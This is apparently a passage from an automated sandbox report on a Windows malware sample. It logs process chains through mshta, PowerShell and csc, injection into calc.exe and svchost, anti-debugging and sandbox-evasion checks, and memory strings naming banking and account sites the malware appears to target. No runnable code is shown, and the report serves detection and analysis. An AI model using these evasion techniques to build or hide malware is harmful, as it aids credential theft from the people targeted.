                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00133187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00133187
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\calc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Roaming\cosses.exe | API/Special instruction interceptor: Address: 16CBF2C
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7AD324
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7AD7E4
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7AD944
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7AD504
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7AD544
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7AD1E4
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7B0154
                  Source: C:\Windows\SysWOW64\calc.exe | API/Special instruction interceptor: Address: 7FF84F7ADA44
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036AD1C0 rdtsc
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\mshta.exe | Window / User API: threadDelayed 9982
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7348
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2254
                  Source: C:\Windows\SysWOW64\calc.exe | Window / User API: threadDelayed 9836
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.dll
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_6-102338)
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | API coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\calc.exe | API coverage: 3.0 %
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 8716 | Thread sleep count: 9982 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8860 | Thread sleep count: 7348 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8860 | Thread sleep count: 2254 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8908 | Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256 | Thread sleep count: 136 > 30
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256 | Thread sleep time: -272000s >= -30000s
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256 | Thread sleep count: 9836 > 30
                  Source: C:\Windows\SysWOW64\calc.exe TID: 8256 | Thread sleep time: -19672000s >= -30000s
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288 | Thread sleep time: -70000s >= -30000s
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288 | Thread sleep count: 41 > 30
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288 | Thread sleep time: -61500s >= -30000s
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288 | Thread sleep count: 42 > 30
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe TID: 8288 | Thread sleep time: -42000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\calc.exe | Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\calc.exe | Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017445A GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017C6D1 FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00173B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                  Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_0324C760 FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: 16d07F9.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817140197.00000000015C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                  Source: 16d07F9.12.dr | Binary or memory string: discord.comVMware20,11696428655f
                  Source: 16d07F9.12.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: global block list test formVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: powershell.exe, 00000003.00000002.1481076364.000000000069E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1497317464.0000000007D3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: 16d07F9.12.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                  Source: 16d07F9.12.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: 16d07F9.12.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: 16d07F9.12.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: 16d07F9.12.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: calc.exe, 0000000C.00000002.3816500953.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.1975014267.0000025E963CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: 16d07F9.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                  Source: 16d07F9.12.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: 16d07F9.12.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: 16d07F9.12.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: 16d07F9.12.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                  Source: 16d07F9.12.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                  Source: 16d07F9.12.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: 16d07F9.12.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: 16d07F9.12.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: 16d07F9.12.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: 16d07F9.12.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\calc.exe | Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036AD1C0 rdtsc
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_00417893 LdrLoadDll
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00183F09 BlockInput
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00113B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00145A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00114B37 LoadLibraryA,GetProcAddress
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_016CC1F8 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_016CC198 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_016CAB78 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036EF367 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036D437C mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03637370 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D34C mov eax, dword ptr fs:[00000030h]7_2_0362D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D34C mov eax, dword ptr fs:[00000030h]7_2_0362D34C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705341 mov eax, dword ptr fs:[00000030h]7_2_03705341
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629353 mov eax, dword ptr fs:[00000030h]7_2_03629353
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629353 mov eax, dword ptr fs:[00000030h]7_2_03629353
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov ecx, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA352 mov eax, dword ptr fs:[00000030h]7_2_036FA352
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F132D mov eax, dword ptr fs:[00000030h]7_2_036F132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F132D mov eax, dword ptr fs:[00000030h]7_2_036F132D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365F32A mov eax, dword ptr fs:[00000030h]7_2_0365F32A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03627330 mov eax, dword ptr fs:[00000030h]7_2_03627330
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B930B mov eax, dword ptr fs:[00000030h]7_2_036B930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B930B mov eax, dword ptr fs:[00000030h]7_2_036B930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B930B mov eax, dword ptr fs:[00000030h]7_2_036B930B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C310 mov ecx, dword ptr fs:[00000030h]7_2_0362C310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03650310 mov ecx, dword ptr fs:[00000030h]7_2_03650310
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF3E6 mov eax, dword ptr fs:[00000030h]7_2_036EF3E6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037053FC mov eax, dword ptr fs:[00000030h]7_2_037053FC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036663FF mov eax, dword ptr fs:[00000030h]7_2_036663FF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC3CD mov eax, dword ptr fs:[00000030h]7_2_036EC3CD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EB3D0 mov ecx, dword ptr fs:[00000030h]7_2_036EB3D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036533A5 mov eax, dword ptr fs:[00000030h]7_2_036533A5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036633A0 mov eax, dword ptr fs:[00000030h]7_2_036633A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036633A0 mov eax, dword ptr fs:[00000030h]7_2_036633A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365438F mov eax, dword ptr fs:[00000030h]7_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365438F mov eax, dword ptr fs:[00000030h]7_2_0365438F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370539D mov eax, dword ptr fs:[00000030h]7_2_0370539D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0368739A mov eax, dword ptr fs:[00000030h]7_2_0368739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0368739A mov eax, dword ptr fs:[00000030h]7_2_0368739A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FD26B mov eax, dword ptr fs:[00000030h]7_2_036FD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FD26B mov eax, dword ptr fs:[00000030h]7_2_036FD26B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362826B mov eax, dword ptr fs:[00000030h]7_2_0362826B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03659274 mov eax, dword ptr fs:[00000030h]7_2_03659274
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03671270 mov eax, dword ptr fs:[00000030h]7_2_03671270
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03671270 mov eax, dword ptr fs:[00000030h]7_2_03671270
